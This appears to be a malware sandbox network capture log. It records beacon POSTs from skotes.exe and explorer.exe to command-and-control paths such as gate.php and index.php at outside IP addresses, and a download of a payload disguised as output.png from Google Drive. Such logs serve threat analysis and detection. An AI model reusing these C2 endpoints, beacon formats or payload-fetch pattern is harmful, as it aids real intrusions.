                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:45.346981049 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:46.655031919 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:50:45 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        140192.168.2.1050295185.215.113.43807820C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:46.377274036 CET306OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 152
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39
                                                                                                                                                                                                                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:47.714988947 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:50:47 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        141192.168.2.1050296185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:46.913491011 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:47.034245968 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:48.475965977 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:50:47 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        142192.168.2.1050300185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:48.729895115 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:48.854419947 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:50.166421890 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:50:49 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        143192.168.2.1050301185.215.113.43807820C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:49.557113886 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:50.896805048 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:50:50 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 1 0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        144192.168.2.1050302185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:50.404855967 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:50.537748098 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:52.007617950 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:50:51 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        145192.168.2.1050311185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:52.246288061 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:52.370877981 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:53.722778082 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:50:52 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        146192.168.2.1050315185.215.113.43807820C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:52.656989098 CET306OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 152
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39
                                                                                                                                                                                                                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:54.315164089 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:50:54 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        147192.168.2.1050316185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:53.958751917 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:54.079049110 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:55.567430973 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:50:54 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        148192.168.2.1050319185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:55.873969078 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:55.996365070 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:57.628992081 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:50:56 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        149192.168.2.1050323185.215.113.43807820C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:56.988130093 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:58.110018015 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:50:57 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 1 0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        0192.168.2.1049870216.58.208.2384438092C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:17 UTC150OUTGET /uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1
                                                                                                                                                                                                                                                                                        User-Agent: FileDownloader
                                                                                                                                                                                                                                                                                        Host: drive.google.com
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:18 UTC1319INHTTP/1.1 303 See Other
                                                                                                                                                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:48:17 GMT
                                                                                                                                                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download
                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-s6-ID_3jO9o-vYeeCv0C8g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        1192.168.2.1049875216.58.208.2384438120C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:19 UTC150OUTGET /uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1
                                                                                                                                                                                                                                                                                        User-Agent: FileDownloader
                                                                                                                                                                                                                                                                                        Host: drive.google.com
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:20 UTC1319INHTTP/1.1 303 See Other
                                                                                                                                                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:48:19 GMT
                                                                                                                                                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download
                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-YuWoytgscBVoPMmF5Kz6cw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        2192.168.2.1049878172.217.17.654438092C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:19 UTC192OUTGET /download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1
                                                                                                                                                                                                                                                                                        User-Agent: FileDownloader
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:23 UTC4915INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                                                        Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                        Content-Security-Policy: default-src 'none'
                                                                                                                                                                                                                                                                                        Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                                                                                                                                        X-Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                        Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                                                                                                        Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                        Content-Disposition: attachment; filename="output.png"
                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                        Access-Control-Allow-Credentials: false
                                                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        Content-Length: 156917
                                                                                                                                                                                                                                                                                        Last-Modified: Mon, 11 Nov 2024 02:30:33 GMT
                                                                                                                                                                                                                                                                                        X-GUploader-UploadID: AFiumC6RV2tztBC7afQxpc4kQnTnyCnDKLtKiDEe-Ge_-bnO1lNYd2IKU4Z9UBmudCpf55jCyt4
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:48:23 GMT
                                                                                                                                                                                                                                                                                        Expires: Thu, 12 Dec 2024 15:48:23 GMT
                                                                                                                                                                                                                                                                                        Cache-Control: private, max-age=0
                                                                                                                                                                                                                                                                                        X-Goog-Hash: crc32c=h6mvlQ==
                                                                                                                                                                                                                                                                                        Server: UploadServer
                                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:23 UTC4915INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 b6 00 00 01 b6 08 06 00 00 00 13 09 a3 70 00 00 80 00 49 44 41 54 78 9c ec dd 07 7c 14 65 fa 07 f0 df 33 9b 0a 09 bd 9d 15 44 20 64 77 36 80 d8 d0 53 9a dc 59 00 5b d6 ce a9 e7 e9 9d 05 b0 23 2a 4c c0 82 67 c5 72 96 bb bf 9e e8 a9 24 58 41 3d 95 66 c3 16 85 ec ec 12 8a 8a 9e 05 0b 9d 00 29 bb f3 fc 3f bb 49 ee 28 d9 64 76 b3 33 ef 6c f6 fd 7e 3e 7e 3e b2 bb 33 ef 93 64 77 9f 79 cb 3c 6f 06 24 49 b2 ce a8 d3 ba 82 c2 c7 2b 8c 61 0c 14 02 74 08 08 3d c0 68 0f 80 40 a8 02 d3 06 10 af 23 c6 2a 03 fc 11 80 25 58 f4 da cf a2 43 97 a4 54 45 a2 03 90 a4 36 67 cc 98 f6 08 e5 fa 88 30 01 c0 71 00 94 04 ce f2 11 13 3d 03 64 3e 87 85 65 5b 2d 88 52 92 da 2c 99 d8 24 29 59 4e 3c b1 03 ea 32 27 12 d3 24 00 dd 92
                                                                                                                                                                                                                                                                                        Data Ascii: PNGIHDRpIDATx|e3D dw6SY[#*Lgr$XA=f)?I(dv3l~>~>3dwy<o$I+at=h@#*%XCTE6g0q=d>e[-R,$)YN<2'$
